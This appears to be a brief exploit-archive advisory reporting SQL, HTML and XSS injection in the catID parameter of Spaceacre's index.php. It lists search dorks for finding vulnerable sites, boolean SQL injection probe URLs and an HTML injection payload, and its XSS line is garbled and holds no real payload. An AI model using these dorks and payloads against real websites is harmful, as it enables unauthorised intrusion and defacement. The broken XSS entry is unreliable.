Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability



-------------------------------------------------------------------------------------------



Author: CoBRa_21



Script Home: http://www.spaceacre.com



Dork 1: inurl:cat1.php?catID= "Spaceacre"



Dork 2: intext:"Designed by Spaceacre"



-------------------------------------------------------------------------------------------



SQL Injection:



http://localhost/[path]/index.php?catID=1 and 1=2

http://localhost/[path]/index.php?catID=1 and 1=1

-------------------------------------------------------------------------------------------



HTML Injection:



http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML İNJ.



-------------------------------------------------------------------------------------------



XSS Injection:



http://localhost/[path]/index.php?catID=index.php?catID= XSS İNJ.